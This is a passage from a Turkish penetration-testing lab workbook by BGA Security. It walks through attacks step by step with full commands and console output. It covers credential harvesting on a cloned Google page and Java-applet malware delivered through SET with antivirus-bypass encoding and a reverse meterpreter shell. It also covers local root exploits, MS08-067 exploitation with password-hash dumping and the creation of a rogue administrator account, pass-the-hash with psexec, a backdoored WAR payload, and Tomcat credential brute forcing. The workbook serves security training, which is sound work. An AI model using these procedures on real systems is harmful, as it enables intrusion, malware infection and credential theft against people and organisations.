PARAM:timeStmp=
PARAM:secTok=
PARAM:_utf8=☃
PARAM: bgresponse=!A0J041-
DW9ebWUQLSHgetwSwJg8AAxYGtioA4Tc6SGmHsC_n2aU1OqFVMvYO7M0-
DkB18In9uNNqbM6hl_9FfehxSmBAQjro0G4xPJSPatX7va_YT5bqRqvGbd74rkgMWTIJ6sMbsKlvLaMSk2-
2dSCalR9akRLT4guyiXDwMlyhemaclNbb1oHJm8BH1UI76smeThGnm2THaT1sNFtOE6M0N05fskfL_htR_-
lJDd4LRcfg6dmuPRf1QhY68NLNyLlQDzS6WnsMUFsIISgEqLzPTMiUFTbY9hbarcCstfwiJHsYXvrBQGGPURSR
YeNV05RlDh03Ub5VHKPMTw
POSSIBLE USERNAME FIELD FOUND: Email=celal.erdik
POSSIBLE PASSWORDFIELD FOUND:Passwd=P@ssw0rd
PARAM:signIn=Sign+in
213.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
PARAM:PersistentCookie=yes
PARAM:rmShown=1
5.Adım: Bulunan parolaların kaydedilmesi için CTRL+C ile çıkarken sonuçlar otomatik olarak xml ve html
formatlarındabirerkopyası/pentest/exploit/set/reportsdizininekaydedilecektir.
[*] File exported to reports/2012-12-16 12:26:12.343849.html foryour reading pleasure...
[*] File in XML format exported to reports/2012-12-16 12:26:12.343849.xml for your reading
pleasure...
Press<return> to continue
Ek Kaynaklar:
---
Uygulama No:BGA-PT-63
Uygulama Adı: Kopya Web Sayfası/Template Üzerinden Zararlı Yazılım Bulaştırma
Amaç: Kullanıcılara kopyalanmış web sayfası üzerinden zararlı yazılım(java) kurdurularak local
sistemimize reverseshellalmak
KullanılanAraçlar:
SET
Metasploit
Adımlar:
1.Adım: Aşağıdaki adımlar takip edilerek Social Engineering Toolset aracı başlatılır ve bir sunucu üzerinde
zararlı yazılım barındıran webtemplate’mizkurulmuşolur.
root@bt:/pentest/exploits/set#./set
214.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
Select fromthe menu:
1) Social-Engineering Attacks
2) Fast-TrackPenetration Testing
3) Third PartyModules
4) UpdatetheMetasploitFramework
5) UpdatetheSocial-EngineerToolkit
6) UpdateSETconfiguration
7) Help, Credits,and About
99) Exit the Social-EngineerToolkit
set> 1
Select fromthe menu:
1) Spear-Phishing AttackVectors
2) Website AttackVectors
3) InfectiousMedia Generator
4) Createa Payload and Listener
5) MassMailer Attack
6) Arduino-BasedAttackVector
7) SMSSpoofing AttackVector
8) Wireless Access PointAttackVector
9) QRCodeGeneratorAttackVector
10) PowershellAttackVectors
11) Third PartyModules
99) Return backto the main menu.
set> 2
1) Java AppletAttackMethod
2) MetasploitBrowserExploitMethod
3) CredentialHarvesterAttackMethod
4) Tabnabbing AttackMethod
5) Man Left in the MiddleAttackMethod
6) Web Jacking AttackMethod
7) Multi-AttackWeb Method
8) Victim Web Profiler
215.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
9) Createor import a CodeSigning Certificate
99) Return to Main Menu
set:webattack>1
1) Web Templates
2) Site Cloner
3) CustomImport
99) Return to WebattackMenu
set:webattack>1
[-] NAT/PortForwarding can beused in the cases whereyourSET machineis
[-] notexternally exposed and may bea differentIP addressthan yourreverselistener.
set> Are you using NAT/PortForwarding [yes|no]:no
[-] Enter the IPaddressof yourinterfaceIP or if yourusing an externalIP, what
[-] will be used forthe connection backand to housethe web server (yourinterface address)
set:webattack> IP address for the reverse connection:192.168.1.102
1. Java Required
2. Gmail
3. Google
4. Facebook
5. Twitter
set:webattack> Select a template:3
[*] Cloning thewebsite: http://www.google.com
[*] This could take a little bit...
[*] Injecting Java Appletattackinto thenewly cloned website.
[*] Filenameobfuscation complete.Payloadnameis:Razx0o
[*] Maliciousjava appletwebsiteprepped fordeployment
Whatpayload do you wantto generate:
Name: Description:
1) WindowsShell Reverse_TCP Spawn a command shellon victim and send backto attacker
216.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
2) Windows Reverse_TCP Meterpreter Spawn a meterpreter shell on victim and send back to
attacker
…
…
14) ShellCodeExecAlphanumShellcode This will drop a meterpreterpayload through shellcodeexec
15) PyInjectorShellcodeInjection This will drop a meterpreter payload through PyInjector
16) Importyourown executable Specify a path foryourown executable
set:payloads>2
Below is a list of encodingsto try and bypassAV.
Select one of the below,'backdoored executable'is typically the best.
1) avoid_utf8_tolower(Normal)
2) shikata_ga_nai(Very Good)
3) alpha_mixed (Normal)
4) alpha_upper(Normal)
5) call4_dword_xor(Normal)
6) countdown (Normal)
7) fnstenv_mov (Normal)
8) jmp_call_additive(Normal)
9) nonalpha (Normal)
10) nonupper(Normal)
11) unicode_mixed (Normal)
12) unicode_upper(Normal)
13) alpha2(Normal)
14) No Encoding (None)
15) Multi-Encoder(Excellent)
16) Backdoored Executable(BEST)
set:encoding>16
set:payloads>PORT of the listener [443]:4445
[*] Generating x64-based powershellinjection code...
[*] Generating x86-based powershellinjection code...
[*] Finished generating powershellinjection bypass.
[*] Encoded to bypassexececution restriction policy...
[-] Backdooring a legit executableto bypassAnti-Virus.Waita few seconds...
[*] Backdoorcompleted successfully.Payload isnow hidden within a legit executable.
[*] UPXEncoding is set to ON,attempting to pack theexecutablewith UPXencoding.
[-] Packing theexecutableand obfuscating PEfile randomly,onemoment.
217.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
[*] Digital SignatureStealing is ON,hijacking a legit digital certificate
[*] Generating OSXpayloadsthrough Metasploit...
[*] Generating Linux payloadsthrough Metasploit...
***************************************************
Web ServerLaunched.Welcome to the SET Web Attack.
***************************************************
[--] Tested on IE6, IE7, IE8, IE9, IE10, Safari,Opera,Chrome,and FireFox [--]
[*] Moving payload into cloned website.
[*] The site hasbeen moved.SETWeb Server is now listening..
[-] Launching MSFListener...
…
…
[resource(/pentest/exploits/set/src/program_junk/meta_config)>setLHOST 192.168.1.102
LHOST => 192.168.1.102
resource(/pentest/exploits/set/src/program_junk/meta_config)>setLPORT8080
LPORT => 8080
resource (/pentest/exploits/set/src/program_junk/meta_config)> set InitialAutoRunScript
post/osx/gather/enum_osx
InitialAutoRunScript=>post/osx/gather/enum_osx
resource(/pentest/exploits/set/src/program_junk/meta_config)>setExitOnSession false
ExitOnSession => false
resource(/pentest/exploits/set/src/program_junk/meta_config)>exploit -j
[*] Started reversehandleron 0.0.0.0:4445
[*] Starting thepayload handler...
[*] Exploitrunning asbackground job.
resource(/pentest/exploits/set/src/program_junk/meta_config)>useexploit/multi/handler
resource (/pentest/exploits/set/src/program_junk/meta_config)> set PAYLOAD
linux/x86/shell/reverse_tcp
[*] Started reversehandleron 192.168.1.102:8080
[*] Starting thepayload handler...
PAYLOAD=> linux/x86/shell/reverse_tcp
resource(/pentest/exploits/set/src/program_junk/meta_config)>setLHOST192.168.1.102
LHOST => 192.168.1.102
resource(/pentest/exploits/set/src/program_junk/meta_config)>setLPORT8081
LPORT => 8081
resource(/pentest/exploits/set/src/program_junk/meta_config)>setExitOnSession false
ExitOnSession => false
resource(/pentest/exploits/set/src/program_junk/meta_config)>exploit -j
218.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
[*] Exploitrunning asbackground job.
msf exploit(handler) >
[*] Started reversehandleron 192.168.1.102:8081
[*] Starting thepayload handler...
192.168.1.104 - - [16/Dec/2012 12:48:47] "GET / HTTP/1.1" 200 -
2.Adım : 192.168.102 Sunucusu üzerinde antivirüse yakalanmaması için encode edilmiş java
appleti(sahte) kurulu google web sayfamız kurulmuştur. Şimdi kurbanlara bu adresin link olarak verilmesi
ve onların ziyaret etmesi sağlanmalıdır. Ziyaret eden kurbanlara aşağıdaki gibi java uygulamasını
çalıştırması istenecektir
3.Adım : Kurban makinası üzerinde bulunan antivürüslerde bu java uygulamasını yakalayacaktır. Kurban
bu uygulamayı Kabul ettiğinde karşısına gerçekten google sayfası(template/kopya web sayfası)
açılacaktır.
219.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
4.Adım : Kurban uygulamayı Kabul ettiginde aşağıdaki gibi ilgili meterpreter ajanı sisteme kurulacak ve
bizimsunucumuzareversetcpbağlantıile meterpreteroturumuaçaçaktır.
[*] Started reversehandleron 192.168.1.102:8081
[*] Starting thepayload handler...
192.168.1.104 - - [16/Dec/2012 13:03:32] "GET / HTTP/1.1" 200 -
[*] Sending stage(752128 bytes) to 192.168.1.104
[*] Meterpreter session 1 opened (192.168.1.102:4445 -> 192.168.1.104:52564) at 2012-12-16 13:04:18
+0200
Interrupt:usethe 'exit' command to quit
msf exploit(handler) >sessions -i
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 fcerdixF. Celal ERDIK @ FCERDIX 192.168.1.102:4445 ->
192.168.1.104:52564 (192.168.1.104)
220.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
msf exploit(handler) >sessions -i 1
[*] Starting interaction with1...
meterpreter > ifconfig
Interface 1
============
Name : SoftwareLoopbackInterface1
HardwareMAC: 00:00:00:00:00:00
MTU : 1500
IPv4 Address:127.0.0.1
IPv4 Netmask:255.0.0.0
Interface11
============
Name : Intel(R) PRO/1000 MT NetworkConnection
HardwareMAC: 00:0c:29:16:0e:98
MTU : 1500
IPv4 Address:192.168.1.104
IPv4 Netmask:255.255.255.0
meterpreter > shell
Process2008 created.
Channel1 created.
MicrosoftWindows[Version 6.1.7600]
Copyright(c) 2009 MicrosoftCorporation. Allrightsreserved.
C:ProgramFiles(x86)Mozilla Firefox>
Ek Kaynaklar:
Exploit Çalıştırma ve Metasploit Kullanımı LabUygulamaları
Uygulama No:BGA-PT-64
Uygulama Adı: Internetten Exploit Arama ve Çalıştırma
221.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
Amaç: Online olarak nasıl(nerelerden) exploit elde edilebileceği ve bunların nasıl çalıştırılabileceğini
gösterme
KullanılanAraçlar:
Exploit-db.com
Adımlar:
1.Adım: Exploit-db.comüzerindenexploitbulma;
222.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
2.Adım: C programlamadilinde yazılmışbirtest.cisimli local exploitiçalıştırmakiçin.
ÖnceliklebuCkoduwgetile tam adresindenindirilir;
test@bt:~# wget http://downloads.securityfocus.com/vulnerabilities/exploits/51625.c
--2012-12-19 20:32:48-- http://downloads.securityfocus.com/vulnerabilities/exploits/51625.c
Resolving downloads.securityfocus.com...143.127.139.111
Connecting to downloads.securityfocus.com|143.127.139.111|:80... connected.
HTTP requestsent, awaiting response...200OK
Length:6615 (6.5K) [text/plain]
Saving to:`51625.c'
100%[================================================================================
===================>] 6,615 20.5K/s in 0.3s
2012-12-19 20:32:54 (20.5 KB/s) - `51625.c' saved [6615/6615]
test@bt:~#
Daha sonra indirilenbuCdilinde yazılmışscriptgccile derlenir.
test@bt:~$ gcc 51625.c -olocallinuxexploit
root@bt:~$
Sonrasındaaşağıdaki gibi çalıştırılır ve mevcutkernel zaafiyeti olansistemderootolunabilir.
223.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
test@bt:~$ ./locallinuxexploit
root@bt:~#
Ek Kaynaklar:
---
Uygulama No:BGA-PT-65
Uygulama Adı: Linux Yerel Güvenlik Zafiyeti Hak Yükseltme
Amaç: Linux kernelında çıkan yerel bir güvenlik zaafiyeti kullanılarak kısıtlı haklardan root haklarına
yükselme
KullanılanAraçlar:
Exploit-db
C
gcc
Adımlar:
1.Adım: Sistemde bulunanaçıklığıeploitedebilecegimizscriptiindirmemizgerekiyor.
2.Adım: Gcc ile koduderliyouruzve derlenmişscriptçıktısını root-ol ismiyle kaydediyoruz..
224.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
test@bt:~/Desktop# gcc 15704.c -o root-ol
3.Adım: Koduçalıştırıyoruz ve root oluyoruz..
test@bt:~/Desktop$ ./root-ol
Hey Congratulations..You areroot..
root@bt:#
Ek Kaynaklar:
---
Uygulama No:BGA-PT-66
Uygulama Adı: Windows Yerel Güvenlik Zafiyeti Hak Yükseltme
Amaç: Windows sistemlerde mevcut güvenlik zaafiyetleri kullanılarak kısıtlı haklardan system haklarına
geçiş.
KullanılanAraçlar:
Metasploit
Adımlar:
1.Adım: Sistemde meterpreter oturumu elde ediyoruz.Bunu çeşitli güvenlik zaafiyetleri(ms08-
067,psexecvs) ile elde edebilirsiniz.Bukısımiçinbakınızms08-067 zaafiyeti istismarı.
2.Adım: Yerel hak yükseltme açıklının exploiti olan ms11-080 için session parametresi ile daha once elde
ettiğimizmeterpreteroturumidsini veriyoruz.Ve çalıştırıyoruz.
msf > use exploit/windows/local/ms11_080_afdjoinleaf
msf exploit(ms11_080_afdjoinleaf) >show options
Moduleoptions(exploit/windows/local/ms11_080_afdjoinleaf):
Name CurrentSetting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this moduleon.
Payload options(windows/meterpreter/reverse_tcp):
225.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique:seh,thread,process,none
LHOST 192.168.1.102 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(ms11_080_afdjoinleaf) >set SESSION1
SESSION => 1
msf exploit(ms11_080_afdjoinleaf) >exploit
3.Adım: Meterpreter oturumu aldıktan sonra bu oturumu kullanarak windows makinanın
memory’sindeki systemyetkilerine sahipbirtokenikopyalayarak dasystemyetkilerine yükselinebilir.
meterpreter > getsystem -h
Usage: getsystem [options]
Attempt to elevate your privilege to that of local system.
OPTIONS:
-h Help Banner.
-t The technique to use. (Default to ‘0′).
0 : All techniques available
1 : Service – Named Pipe Impersonation (In Memory/Admin)
2 : Service – Named Pipe Impersonation (Dropper/Admin)
3 : Service – Token Duplication (In Memory/Admin)
4 : Exploit – KiTrap0D (In Memory/User)
meterpreter > getsystem -t 3
…got system (via technique 1).
meterpreter > getuid
Server username:NTAUTHORITYSYSTEM
Ek Kaynaklar:
226.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
---
Uygulama No:BGA-PT-67
Uygulama Adı: Metasploit KullanarakMs08-067 Zafiyeti İstismarı
Amaç: Windows RPC’de çıkan bellek taşması açıklığı olan Ms08-067 açıklığını exploit ederek kullanıcı adı
parolagerektirmeksizinuzaksistemde erişimelde etme.
KullanılanAraçlar:
Metasploit
Adımlar:
1.Adım: Metasploitbaşlatalımve ilgili modülübulalım
root@bt:/#msfconsole
=[ metasploitv4.5.0-release [core:4.5 api:1.0]
+ -- --=[ 1002 exploits - 562 auxiliary - 164 post
+ -- --=[ 262 payloads - 28 encoders - 8 nops
=[ svn r16175 updated yesterday (2012.12.11)
msf >
msf > search ms08_067
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/windows/smb/ms08_067_netapi 2008-10-28 great Microsoft Server Service Relative
PathStackCorruption
msf >
2.Adım: İlgili metasploitmodülününkullanımı,parametrelerininverilmesi ve exploitedilmesi:
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options
227.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
Moduleoptions(exploit/windows/smb/ms08_067_netapi):
Name CurrentSetting Required Description
---- --------------- -------- -----------
RHOST yes The targetaddress
RPORT 445 yes Set the SMBservice port
SMBPIPE BROWSER yes The pipe nameto use(BROWSER,SRVSVC)
Exploit target:
Id Name
-- ----
0 AutomaticTargeting
msf exploit(ms08_067_netapi) >
msf exploit(ms08_067_netapi) > set RHOST 192.168.2.10
RHOST => 192.168.2.10
msf exploit(ms08_067_netapi) > exploit
[*] Started reversehandleron 192.168.2.5:4444
[*] Automatically detecting thetarget...
[*] Fingerprint:WindowsXP - Service Pack 1 - lang:English
[*] Selected Target:WindowsXPSP1 English (AlwaysOn NX)
[*] Attempting to triggerthe vulnerability...
[*] Sending stage(752128 bytes) to 192.168.2.10
[*] Meterpreter session 1 opened (192.168.2.5:4444 -> 192.168.2.10:3525) at 2012-12-01 04:11:46
+0200
meterpreter >
3.Adım: Meterpreteroturumunueldeettik.Yetkilerimizigörmekiçingetuidkomutuverilebilir.
meterpreter > getuid
Server username:NTAUTHORITYSYSTEM
meterpreter > ifconfig
Interface 1
============
Name : MS TCPLoopbackinterface
HardwareMAC: 00:00:00:00:00:00
228.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
MTU : 1520
IPv4 Address:127.0.0.1
IPv4 Netmask:255.0.0.0
Interface 2
============
Name : Ethernet Interface- Advanced Micro Devices [AMD]
HardwareMAC: 0a:1a:22:11:b3:12
MTU : 1500
IPv4 Address:192.168.2.10
IPv4 Netmask:255.255.255.0
meterpreter >
meterpreter > sysinfo
Computer : bgatestpc
OS : WindowsXP(Build 2600, Service Pack1).
Architecture : x64
SystemLanguage:tr_TR
Meterpreter : x64/win32
meterpreter >
4.Adım: Sistemdeki kullanıcıhashlerini elde edelim;
meterpreter > run hashdump
[*] Obtaining thebootkey...
[*] Calculating thehbootkey using SYSKEY 21a411a142be14v36c12b19e14cb1319...
[*] Obtaining theuserlist and keys...
[*] Decrypting userkeys...
[*] Dumping password hints...
No users withpassword hintson thissystem
[*] Dumping password hashes...
Administrator:500:eda1e235e54112cec1d2b1b25b104be:1320008030e9aa242cda131cb805542fe:::
bga-lab:501:eda1e235e54112cec1d2b1b25b104be:1320008030e9aa242cda131cb805542fe:::
5.Adım: Meterpreter oturumundan windwos shell’ini isteyelim ve windows shell üzerinden bir user
oluşturup,aktif edip,administratorlocalgrubunaekleyelim.
229.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
meterpreter > shell
Process2116 created.
Channel1 created.
MicrosoftWindowsXP[Version 4.0.1300]
(C) Copyright1985-2001 MicrosoftCorp.
C:WINDOWSsystem32>
C:WINDOWSsystem32>netuser test P@ssw0rd!bga /add
net usertest P@ssw0rd25 /add
The command completed successfully.
C:WINDOWSsystem32>netuser test /active:yes
net usertest /active:yes
The command completed successfully.
C:WINDOWSsystem32>netlocalgroupAdministratorstest/add
net localgroup Administratorstest/add
The command completed successfully.
C:WINDOWSsystem32>
Ek Kaynaklar:
---
Uygulama No:BGA-PT-68
Uygulama Adı: Metasploit KullanarakPass The Hash (Parolasız Sistem Erişimi)
Amaç: Sistemlerden elde edilen parola hash’lerini kırmadan direct bu hashler ile sistemlerde oturum
açma
KullanılanAraçlar:
Metasploitpsexec
Adımlar:
1.Adım : Metasploitçalıştırma;
root@bt:~/Desktop# msfconsole
=[ metasploitv4.2.0-release [core:4.2 api:1.0]
+ -- --=[ 805 exploits - 451 auxiliary - 135 post
+ -- --=[ 246 payloads - 27 encoders - 8 nops
=[ svn r16154 updated 289 daysago (2012.02.23)
230.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
Warning:This copy of the MetasploitFrameworkwaslastupdated 289 daysago.
We recommend thatyou updatetheframeworkatleastevery otherday.
For information on updating yourcopy of Metasploit,pleasesee:
https://community.rapid7.com/docs/DOC-1306
msf >
2.Adım: Psexecisimli exploitinbulunmasıve ilgili parametreleratanarakexploitedilipsisteme bağlanma;
msf > search psexec
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/windows/smb/psexec 1999-01-01 manual Microsoft Windows Authenticated User
CodeExecution
exploit/windows/smb/smb_relay 2001-03-31 excellent Microsoft Windows SMB Relay Code
Execution
msf > use exploit/windows/smb/psexec
msf exploit(psexec) >show options
Moduleoptions(exploit/windows/smb/psexec):
Name CurrentSetting Required Description
---- --------------- -------- -----------
RHOST yes The targetaddress
RPORT 445 yes Set the SMBservice port
SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...)
or a normalread/writefoldershare
SMBDomain WORKGROUP no The Windowsdomain to usefor authentication
SMBPass no The password forthespecified username
SMBUser no The usernameto authenticateas
Exploit target:
Id Name
-- ----
0 Automatic
231.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
msf exploit(psexec) >set RHOST 192.168.2.5
RHOST => 192.168.2.5
msf exploit(psexec) >set SMBUser Administrator
SMBUser=> Administrator
msf exploit(psexec) > set SMBPass
c1a4b513d51bb1dcabd1b435b224041a:12aa250e5f7be65864aa4rc1ab134302
SMBPass=> c1a4b513d51bb1dcabd1b435b224041a:12aa250e5f7be65864aa4rc1ab134302
msf exploit(psexec) >exploit
[*] Started reversehandleron 192.168.2.3:4444
[*] Connecting to theserver...
[*] Authenticating to 192.168.2.5:445|WORKGROUP as user'Administrator'...
[*] Uploading payload...
[*] Created TDHsJbAQ.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.2.5[svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.2.5[svcctl] ...
[*] Obtaining a service managerhandle...
[*] Creating a new service (IGeUeVNy - "MsTfiq")...
[*] Closing service handle...
[*] Opening service...
[*] Starting theservice...
[*] Removing theservice...
[*] Sending stage(752128 bytes) to RHOST 192.168.2.5
[*] Closing service handle...
[*] Deleting TDHsJbAQ.exe...
[*] Meterpreter session 1 opened (RHOST 192.168.2.3:4444 -> RHOST 192.168.2.5:4122) at 2012-12-07
11:17:06 +0200
meterpreter> pwd
C:WINDOWSsystem32
meterpreter > shell
Process 3680 created.
Channel 1 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:WINDOWSsystem32>
232.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
Ek Kaynaklar:
Uygulama No:BGA-PT-69
Uygulama Adı: Metasploit Kullanarakbackdoorözelliği olan .WAR Dosyası Oluşturma
Amaç: Javadilinde geliştirilmişwebuygulamalarındaihtiyaçduyulan.waruzantılıajanoluşturma
KullanılanAraçlar:
Msfpayload
Adımlar:
1.Adım: Msfpayload çeşitli(php,exe,asp,java,c,jsp) ajan yazılımlar oluşturmak için kullanılan bir
metasploituygulamasıdır.Wardosyasıoluşturmadanönce kullanımınıinceleyelim.
root@pentest09:/home/celal#msfpayload -h
Usage: /opt/metasploit/msf3/msfpayload [<options>] <payload> [var=val]
<[S]ummary|C|[P]erl|Rub[y]|[R]aw|[J]s|e[X]e|[D]ll|[V]BA|[W]ar>
OPTIONS:
-h Help banner
-l List available payloads
2.Adım: Msfpayloadile kullanılabilecekpayloadlarıgörelim.
root@pentest09:/home/celal#msfpayload -l
FrameworkPayloads(251total)
==============================
Name Description
---- -----------
aix/ppc/shell_bind_tcp Listen fora connection and spawn a command shell
aix/ppc/shell_find_port Spawn a shell on an established connection
aix/ppc/shell_interact Simply execve /bin/sh (forinetd programs)
aix/ppc/shell_reverse_tcp Connectbackto attackerand spawn a command shell
bsd/sparc/shell_bind_tcp Listen fora connection and spawn a command shell
233.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
bsd/sparc/shell_reverse_tcp Connectbackto attackerand spawn a command shell
…...
…...
…...
windows/meterpreter/reverse_tcp Connect back to the attacker, Inject the meterpreter
server DLL via the Reflective Dll Injection payload (staged)
…....
3.Adım: Reverce_tcp payloadunu kullanarak ajanımızı oluşturmak istedik.Bu ajan çalıştırıldığında bizim
local makinamıza bir ters bağlantı(ondan bize,bizden ona degil) kuracaktır.En sonuna koyduğumuz O ile
seçenekleri görmekistediğimizi belirtiyoruz.
root@pentest09:/home/celal#msfpayloadwindows/meterpreter/reverse_tcpO
Name:WindowsMeterpreter(ReflectiveInjection),ReverseTCPStager
Module:payload/windows/meterpreter/reverse_tcp
Version:14774, 15548, 14976
Platform:Windows
Arch:x86
NeedsAdmin:No
Total size: 290
Rank:Normal
Provided by:
skape<mmiller@hick.org>
sf <stephen_fewer@harmonysecurity.com>
hdm<hdm@metasploit.com>
Basic options:
Name CurrentSetting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique:seh,thread,process,none
LHOST yes The listen address
LPORT 4444 yes The listen port
Description:
Connectbackto the attacker,Injectthe meterpreterserver DLL via
theReflective Dll Injection payload (staged)
234.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
4.Adım: test.war ismiyle WAR dosyamızı oluşturuyoruz. W parametresi war dosyası oluşturmak
istenildiğini gösterir.CiçinC, Perl içinPerl kullanılabilir.
root@pentest09:/home/celal# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.2.1 W
>> test.war
Created by msfpayload (http://www.metasploit.com).
Payload:windows/meterpreter/reverse_tcp
Length:290
Options:{"set"=>"","LHOST"=>"192.168.2.1"}
Ek Kaynaklar:
---
Uygulama No:BGA-PT-70
Uygulama Adı: Metasploit KullanarakTomcat Zafiyeti İstismarı
Amaç: Tomcat üzerindenwebsunucuyawebshell atılaraksistemüzerinde uzaktankodçalıştırma
KullanılanAraçlar:
Tomcat
Metasploit– tomcat_mgr_login
Metasploit– tomcat_mgr_deploy
Adımlar:
1.Adım: Administrator sayfasına(http://testip:8080/manager/html) girilebilecek bir tomcat
uygulamasınının olması gerekmektedir. Bunun için hedef uygulama için default tomcat username
parolalarınındenenmesi ile birbrute force saldırısıyapılır.
msf auxiliary(tomcat_administration) >use auxiliary/scanner/http/tomcat_mgr_login
msf auxiliary(tomcat_mgr_login)>show options
Moduleoptions(auxiliary/scanner/http/tomcat_mgr_login):
Name CurrentSetting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS true no Try blank passwords for all
users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0
to 5
PASSWORD no A specific password to authenticate
with
PASS_FILE /opt/metasploit/msf3/data/wordlists/tomcat_mgr_default_pass.txt no File
containing passwords,oneperline
235.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
Proxies no Usea proxy chain
RHOSTS yes The target address range or CIDR
identifier
RPORT 8080 yes The targetport
STOP_ON_SUCCESS false yes Stop guessing when a credential
worksfora host
THREADS 1 yes The numberof concurrentthreads
URI /manager/html yes URI for Manager login. Default
is /manager/html
USERNAME no A specific usernameto authenticateas
USERPASS_FILE /opt/metasploit/msf3/data/wordlists/tomcat_mgr_default_userpass.txt no
File containing usersand passwordsseparated by space,onepairperline
USER_AS_PASS true no Try the username as the
password forallusers
USER_FILE /opt/metasploit/msf3/data/wordlists/tomcat_mgr_default_users.txt no File
containing users,oneper line
VERBOSE true yes Whetherto print outputforall attempts
VHOST no HTTP server virtual host
msf auxiliary(tomcat_mgr_login)>set RHOSTS 192.168.2.1
RHOSTS=> 192.168.2.1
msf auxiliary(tomcat_mgr_login)>exploit
[*] 192.168.2.1:8080 TOMCAT_MGR- [01/50] - Trying username:'admin'with password:''
[-] 192.168.2.1:8080 TOMCAT_MGR - [01/50] - /manager/html [Apache Tomcat/4.0.4-b1 (HTTP/1.1
Connector)] [TomcatApplication Manager] failed to login as 'admin'
[*] 192.168.2.1:8080 TOMCAT_MGR- [02/50] - Trying username:'manager'with password:''
[-] 192.168.2.1:8080 TOMCAT_MGR - [02/50] - /manager/html [Apache Tomcat/4.0.4-b1 (HTTP/1.1
Connector)] [TomcatApplication Manager] failed to login as 'manager'
2.Adım: Admin username/parolası bulunduktan sonra metasploit ile meterpreter oturumu alınır. (Biz
defaultportu(8080) ve defaultkullanıcıhesapları(admin/manager) ileloginolacağız)
msf > use exploit/multi/http/tomcat_mgr_deploy
msf exploit(tomcat_mgr_deploy) >showoptions
